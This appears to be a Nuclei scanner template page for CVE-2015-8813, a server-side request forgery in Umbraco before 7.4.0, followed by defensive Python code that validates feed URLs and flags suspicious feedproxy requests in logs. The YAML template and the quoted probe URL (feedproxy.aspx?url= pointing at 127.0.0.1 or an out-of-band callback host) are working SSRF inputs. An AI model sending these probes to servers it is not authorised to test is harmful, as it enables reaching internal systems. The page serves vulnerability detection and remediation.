Umbraco <7.4.0- Server-Side Request Forgery
ID: CVE-2015-8813
Severity: high
Author: emadshanab
Tags: cve2015,cve,ssrf,oast,umbraco
Description
Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
YAML Source

```yaml
id: CVE-2015-8813

info:
  name: Umbraco <7.4.0- Server-Side Request Forgery
  author: emadshanab
  severity: high
  description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
  impact: |
    The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation.
  remediation: |
    Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates.
  reference:
    - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-8813
    - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce
    - http://www.openwall.com/lists/oss-security/2016/02/18/8
    - http://issues.umbraco.org/issue/U4-7457
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2015-8813
    cwe-id: CWE-918
    epss-score: 0.00511
    epss-percentile: 0.76541
    cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: umbraco
    product: umbraco
  tags: cve2015,cve,ssrf,oast,umbraco

http:
  - method: GET
    path:
      - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"

    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 490a0046304402204014bbc58415d851ed611efd9d001653588bdf6d614151f697e94462d401c0b7022026e05653d3a1cabd1fb9a791483de07ee818a49b578a6a917e11ab848c22259c:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-8813.yaml"
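The description above boils down to a `url` parameter that feedproxy.aspx fetched without restricting its target. The following is an added example, not code from the Nuclei template or from Umbraco, showing the two checks a defender wants around such a proxy: an allowlist-plus-address validator for the fetched URL, and a small extractor that pulls the `url` parameter out of a feedproxy.aspx request path so the same validator can be run over web-server logs to flag attempts. The allowlisted host names are constructed for the example.

```python
"""Defensive checks for a feed-proxy endpoint of the CVE-2015-8813 kind (added example)."""
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist of feed hosts; a real deployment would load this from configuration.
ALLOWED_FEED_HOSTS = {"feeds.example.com", "our.umbraco.org"}


def is_safe_feed_url(url, allowed_hosts=ALLOWED_FEED_HOSTS):
    """Return True only for an absolute http(s) URL whose host is exactly on the allowlist
    and is not a loopback, private, link-local or other non-public IP literal."""
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 bracket syntax
        return False
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if not host:
        return False
    # Reject raw IP literals pointing at internal infrastructure (127.0.0.1, 10/8, 169.254/16, ::1, ...)
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None and not ip.is_global:
        return False
    # Exact host match only: no substring or suffix matching, which attackers routinely bypass
    return host.lower() in {h.lower() for h in allowed_hosts}


def feedproxy_target(request_path):
    """Return the url= parameter of a /Umbraco/feedproxy.aspx request path, or None if the
    path is not a feedproxy request. Useful for scanning access logs for exploitation attempts."""
    parts = urlsplit(request_path)
    if not parts.path.lower().endswith("/umbraco/feedproxy.aspx"):
        return None
    return parse_qs(parts.query).get("url", [None])[0]


def is_suspicious_request(request_path):
    """True when the request targets feedproxy.aspx with a url that fails the safety check."""
    target = feedproxy_target(request_path)
    return target is not None and not is_safe_feed_url(target)
```

Requests for which `is_suspicious_request` returns True are exactly the ones a pre-7.4.0 install would have proxied blindly, including the page's `url=http://127.0.0.1:80/index` probe.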